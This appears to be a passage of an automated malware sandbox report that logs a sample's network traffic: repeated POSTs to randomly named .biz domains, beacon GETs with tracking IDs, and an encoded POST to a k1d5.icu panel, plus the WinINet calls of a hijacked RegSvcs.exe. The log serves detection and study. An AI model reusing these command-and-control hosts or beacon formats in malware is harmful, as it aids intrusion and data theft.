              Source: global trafficHTTP traffic detected: POST /kgihcqktxx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /op HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /aywxxumeinieee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ksbp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /shrlpi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mgwvuleuoxgka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /taq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rgpseg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fkkyxxyvwxtnw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /muicwswwpsvuoaa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /obax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vspbg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /smhxeb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cmutmcflogtu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jfsimcxiyb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /iuxqrsqameemay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /btxiqnehclrfsqon HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nbbgwwsoahqctkx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mbhdlepkeeimc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /osobbhwa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vcdqqdvbwhgvsi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /oajmbd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: eufxebus.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gbcstiuy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pwlqfu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rrqafepng.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /inonlcbojnu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ctdtgwag.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /waxb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tnevuluw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /icxil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rkcyrfbj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: whjovd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /decjayv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /oflvinlq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gjogvvpsf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cctwfdagfuqgkcrp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: reczwga.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fysbuxlbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wfyiibhukdwvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rkobxpllgfpahuau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ej HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /pimlqcf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yxqtpqinac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /lakonfsatp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /prs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /wnmeou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /xg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: GET /xg?usid=18&utid=30152701801 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww1.wxgzshna.biz
              Source: global trafficHTTP traffic detected: POST /blqtjaa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /shntjujahohucfd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gsucnqsvdim HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418688 GetModuleHandleA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,8_2_00418688
              Source: global trafficHTTP traffic detected: GET /cygwkoswoy?usid=18&utid=30152678086 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /b?usid=18&utid=30152678348 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /gedtsq?usid=18&utid=30152678479 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /en?usid=18&utid=30152678739 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
              Source: global trafficHTTP traffic detected: GET /yhikx?usid=18&utid=30152687280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
              Source: global trafficHTTP traffic detected: GET /xrkixnpk?usid=18&utid=30152687444 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
              Source: global trafficHTTP traffic detected: GET /xg?usid=18&utid=30152701801 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww1.wxgzshna.biz
              Source: unknownHTTP traffic detected: POST /TP341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: k1d5.icuContent-Length: 101Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 6c ea 26 66 97 46 14 e8 40 10 8b 31 11 8b 30 66 ef 47 11 8b 30 65 8b 30 63 8b 30 65 8b 30 60 8b 31 11 8b 30 66 e8 26 66 99 26 66 98 26 66 9a 46 70 9d 3b 17 Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410l&fF@10fG0e0c0e0`10f&f&f&fFp;
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:36 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 